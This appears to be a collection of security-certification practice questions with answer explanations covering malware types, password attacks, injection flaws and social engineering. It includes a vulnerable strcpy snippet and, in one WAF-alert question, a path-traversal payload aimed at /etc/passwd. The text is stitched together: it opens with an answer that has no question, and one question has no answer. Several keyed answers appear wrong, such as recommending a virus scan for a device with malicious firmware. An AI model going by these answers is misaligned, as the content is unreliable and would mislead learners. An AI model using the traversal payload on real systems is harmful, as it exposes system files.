C. Rootkit A rootkit is a program or, more often, a collection of software tools that gives a threat actor remote access to and control over a computer or other system. While there have been legitimate uses for this type of software, such as to provide remote end-user support, most rootkits open a backdoor on victim systems to introduce malicious software, such as viruses, ransomware, keylogger programs or other types of malware, or to use the system for further network security attacks. Rootkits often attempt to prevent detection of malicious software by endpoint antivirus software. user32.dll is a module that contains Windows API functions related to the Windows user interface (window handling, basic UI functions, and so forth). user32.dll is a system component that is needed for your PC to work properly. It should not be removed. kernel32.dll is the most important Microsoft Windows kernel DLL. Functionality addressing most Windows functions is linked to this kernel DLL in some way. The Kernel32.dll file is a 32-bit dynamic link library file used in Windows 95, 98 and Me. The Kernel32.dll file handles memory management, input/output operations and interrupts. When you start Windows, Kernel32.dll is loaded into a protected memory space so that other programs do not take it over. kernel32.dll is a system component that is needed for your PC to work properly. It should not be removed.
A company's user lockout policy is enabled after five unsuccessful login attempts. The help desk notices a user is repeatedly locked out over the course of a workweek. Upon contacting the user, the help desk discovers the user is on vacation and does not have network access. Which of the following types of attacks are MOST likely occurring? (Select two.)
A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicates it was pushed from the central patch system. File: winx86_adobe_flash_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 The administrator pulls a report from the patch management system with the following output:
Install Date: 10/10/17 Package Name: java_1.2_x64.exe Target Device: MQ PC's Hash: 01ab28bbde63aa879b35bba62cdes263
Install Date: 10/10/17 Package Name: winx86_adobe_flash_upgrade.exe Target Device: MQ PC's Hash: 99ac28bede43ab869b853ba62c4ea243
Given the above outputs, which of the following MOST likely happened? A. The file was corrupted after it left the patch system B. The file was not approved in the application whitelist system C. The file was embedded with a logic bomb to evade detection. D. The file was infected when the patch manager downloaded it.
C. The file was embedded with a logic bomb to evade detection. A logic bomb is code that executes a certain payload at a pre-defined time or when some other condition is met. Software that is inherently malicious, such as viruses and worms, often contains logic bombs. This technique can be used by a virus or worm to gain momentum and spread before being noticed.
Malware that changes its binary pattern on specific dates at specific times to avoid detection is known as a (n): A. logic bomb B. armored virus C. polymorphic virus D. Trojan
C. polymorphic virus Polymorphic viruses are complex file infectors that can create modified versions of themselves to avoid detection yet retain the same basic routines after every infection. To vary their physical file makeup during each infection, polymorphic viruses encrypt their code and use different encryption keys every time. Polymorphic viruses rely on mutation engines to alter their decryption routines every time they infect a machine. This way, traditional security solutions may not easily catch them because they do not use static, unchanging code. The use of complex mutation engines that generate billions of decryption routines makes them even more difficult to detect.
Which of the following differentiates a collision attack from a rainbow table attack? A. In a collision attack, the hash and the input data are equivalent B. A rainbow table attack uses the hash as a password C. In a collision attack, the same input results in different hashes D. A rainbow table attack performs a hash lookup
D. A rainbow table attack performs a hash lookup A rainbow table is a listing of all possible plaintext permutations of hashed passwords specific to a given hash algorithm. Rainbow tables are often used by password cracking software for network security attacks. All computer systems that require password-based authentication store databases of passwords associated with user accounts, typically hashed rather than plaintext as a security measure. Once an attacker gains access to a system's password database, the password cracker compares the rainbow table's precompiled list of potential hashes to the hashed passwords in the database. The rainbow table associates plaintext possibilities with each of those hashes, which the attacker can then exploit to access the network as an authenticated user.
An analyst is reviewing a simple program for potential security vulnerabilities before it is deployed to a Windows server. Given the following code: void foo(char *bar) { char random_user_input[12]; strcpy(random_user_input, bar); } Which of the following vulnerabilities is present? A. Backdoor B. Integer overflow C. Bad memory pointer D. Buffer overflow
D. Buffer overflow This is an example of a buffer overflow (stack overflow). The canonical method for exploiting a stack-based buffer overflow is to overwrite the function return address with a pointer to attacker-controlled data (usually on the stack itself). This is illustrated with strcpy(random_user_input, bar) in the example. This code takes an argument from the command line and copies it to the local stack variable random_user_input. This works fine for command line arguments smaller than 12 characters. Any arguments longer than 11 characters will result in corruption of the stack. (The maximum number of characters that is safe is one less than the size of the buffer here because in the C programming language strings are terminated by a zero-byte character. A twelve-character input thus requires thirteen bytes to store, the input followed by the sentinel zero byte. The zero byte then ends up overwriting a memory location that's one byte beyond the end of the buffer.) strcpy is potentially unsafe because it can lead to buffer overflow if you try to copy a string to a buffer that is not large enough to contain it. strcpy_s is "safer" because you have to explicitly specify the size of the target buffer, so the function will not overflow it. Because strcpy does not check for sufficient space in strDestination before it copies strSource, it is a potential cause of buffer overruns. Therefore, we recommend that you use strcpy_s instead.
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market? A. Organized crime B. Insider C. Hacktivist D. Competitor
D. Competitor Proprietary information, also known as a trade secret, is information a company wishes to keep confidential. Proprietary information can include secret formulas, processes, and methods used in production. It can also include a company's business and marketing plans, salary structure, customer lists, contracts, and details of its computer systems. In some cases, the special knowledge and skills that an employee has learned on the job are considered to be a company's proprietary information. Companies may also develop security systems to protect their proprietary information from being stolen by foreign or domestic competitors. Business and industrial espionage is an ongoing activity that clandestinely seeks to obtain trade secrets by illegal methods. A corporate system for protecting proprietary information would include a comprehensive plan ranging from restricting employee access, to data protection, to securing phone lines and meeting rooms. In some cases, a chief information officer (CIO) would be responsible for implementing such a plan.
Which of the following best describes a routine in which semicolons, dashes, quotes, and commas are removed from a string? A. Exception handling to protect against XSRF attacks B. Error handling to protect against program exploitation C. Padding to protect against string buffer overflows D. Input validation to protect against SQL injection
D. Input validation to protect against SQL injection Explanation: SQL injection is one of the most common web attack mechanisms utilized by attackers to steal sensitive data from organizations. While SQL injection can affect any data-driven application that uses a SQL database, it is most often used to attack web sites. SQL injection is a code injection technique that hackers can use to insert malicious SQL statements into input fields for execution by the underlying SQL database. This technique is made possible because of improper coding of vulnerable web applications. These flaws arise because entry fields made available for user input unexpectedly allow SQL statements to go through and query the database directly. The good news is that there actually is a lot that website owners can do to prevent SQL injection. Although there is no such thing as a 100 percent guarantee in network security, formidable obstacles can be placed in the path of SQL injection attempts. Employ comprehensive input validation. Websites must filter all user input. Ideally, user data should be filtered for context. For example, email addresses should be filtered to allow only the characters allowed in an e-mail address, phone numbers should be filtered to allow only the characters allowed in a phone number, and so on.
A security auditor is putting together a report for the Chief Executive Officer (CEO) on personnel security and its impact on the security posture of the whole organization. Which of the following would be the MOST important factor to consider when it comes to personnel security? A. Hacktivist B. Phishing through social media C. Privilege escalation D. Insider threats E. Corporate espionage
D. Insider threats An insider threat is the potential for an individual who has or had authorized access to an organization's assets to use that access, maliciously or unintentionally, to act in a way that could negatively affect the organization. An insider threat is most simply defined as a security threat that originates from within the organization being attacked or targeted, often an employee or officer of an organization or enterprise. An insider threat does not have to be a present employee or stakeholder, but can also be a former employee, board member, or anyone who at one time had access to proprietary or confidential information from within an organization or entity.
A security analyst receives an alert from a WAF with the following payload: var data= "<test test test>" ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this? A. Cross-site request forgery B. Buffer overflow C. SQL injection D. JavaScript data insertion
D. JavaScript data insertion HTML injection is a type of attack focused upon the way HTML content is generated and interpreted by browsers at the client side. JavaScript is likewise a widely used technology in dynamic web sites, so injection techniques based on it fall under the same heading of 'code injection'. When developing web applications, it is advisable to follow these considerations to prevent possible code injection. Do not rely on client-side JavaScript validation whenever possible; as shown, this is easily deceived using "in-line" injection. For example, suppose you have a shopping portal where you rely on the price of each item being set at the client side. Don't store sensitive data in cookies, because they can be easily modified by an attacker, as seen in the question. If you need to store data in cookies, store it with a hash signature generated with a server-side key.
Which of the following works by implanting software on systems but delays execution until a specific set of conditions is met? A. Ransomware B. Scareware C. Trojan D. Logic bomb
D. Logic bomb A logic bomb is a malicious program timed to cause harm at a certain point in time, but is inactive up until that point. A set trigger, such as a preprogrammed date and time, activates a logic bomb. Once activated, a logic bomb executes malicious code that causes harm to a computer. A logic bomb's trigger conditions may also include other variables, such that the bomb is launched after a specific number of database entries. However, computer security experts believe that the absence of an expected action may launch a logic bomb as well, and that these types of logic bombs may actually cause the greatest harm. A logic bomb may be implemented by someone trying to sabotage a database when they are fairly certain they will not be present to experience the effects, such as full database deletion. In these instances, logic bombs are programmed to exact revenge or sabotage work. A logic bomb is also known as slag code or malicious logic.
A portable data storage device has been determined to have malicious firmware. Which of the following is the BEST course of action to ensure data confidentiality? A. Format the device B. Re-image the device C. Physically destroy the device D. Perform virus scan in the device
D. Perform virus scan in the device Correctly setting up and running an antivirus scan on your computer is one of the best starting defenses for keeping your system free of malicious software and firmware. In these days of widespread malware (email viruses and dubious websites that can infect your computer), a strong defense begins with selecting an antivirus solution for your computer and understanding how to get the most out of it.
Phishing emails frequently take advantage of high-profile catastrophes reported in the news. Which of the following principles BEST describes the weakness being exploited? A. Scarcity B. Intimidation C. Authority D. Social proof
D. Social proof Social proof is the influence that the actions and attitudes of the people around us (either in real life or online) have on our own behavior. The "proof" element is the idea that if other people are doing it (or saying it), it must be correct. The degree to which social proof affects us can be a result of the number of people seeming to promote something or the particular individuals involved. The actions and opinions of social influencers carry more weight with their colleagues, social network and the general public than is the case with most other individuals. Social media influence is most often associated with online marketing but can also refer to the way social networks and influencers affect the behavior of users in other areas, such as politics. Social proof can influence people to take actions and make decisions differently than they would if they had relied solely upon their own judgment. The undue influence of others can result in conformity and errors. Social proof can amount to mob behavior and a lack of individual opinion, sometimes referred to as herd mentality.
Which of the following occurs when the security of a web application relies on JavaScript for input validation? A. The application is vulnerable to race conditions. B. A host-based firewall is required. C. The security of the application relies on antivirus D. The integrity of the data is at risk.
D. The integrity of the data is at risk. Avoid placing the validation procedures only on the client side. All input should be validated server side. Client-side validation is executed by the client and can be easily bypassed. Client-side validation is a major design problem when it appears in web applications. It places trust in the browser, an entity that should never be trusted. If your application accepts input from the client, always validate for length, range and type on the server. Client-side validation should only be used to improve user experience, never for security purposes. A client-side input validation check can improve application performance by catching malformed input on the client and, therefore, saving a round trip to the server. However, client-side validation can be easily bypassed and should never be used for security purposes. Always use server-side validation to protect your application from malicious attacks. Never trust the browser. Because the browser is running on the user's machine, it can be fully controlled by the user. Therefore, any client-side validation code can be controlled and bypassed by an attacker. Use JavaScript only to enhance your pages. JavaScript is useful for enhancing your application's presentation. However, it has no mechanism to protect the integrity of its code. Do not rely on JavaScript to enforce security decisions.
Before an infection was detected, several of the infected devices attempted to access a URL that was similar to the company name but with two letters transposed. Which of the following BEST describes the attack vector used to infect the devices? A. Cross-site scripting B. URL hijacking C. DNS poisoning D. Typo squatting
D. Typo squatting Typosquatting, also known as URL hijacking, is a form of cybersquatting (sitting on sites under someone else's brand or copyright) that targets Internet users who incorrectly type a website address into their web browser (e.g., "Gooogle.com" instead of "Google.com").
An attack that uses interference as its main method to impede network traffic is which of the following? A. Introducing too much data to a target's memory allocation B. Inundating a target system with SYN requests C. Utilizing a previously unknown security flaw against the target D. Using a similar wireless configuration of a nearby network
D. Using a similar wireless configuration of a nearby network Wireless interference means disruption of one's network. This is a very big challenge, especially owing to the fact that wireless signals will always be subject to disruption. Such interference can be created by a Bluetooth headset, a microwave oven, a cordless phone or a similar wireless configuration of a nearby network. This makes transmission and reception of wireless signals very difficult. Interference can also be caused deliberately, degrading service to the point of denying access to a particular service entirely. Jamming can also be used in conjunction with an evil twin.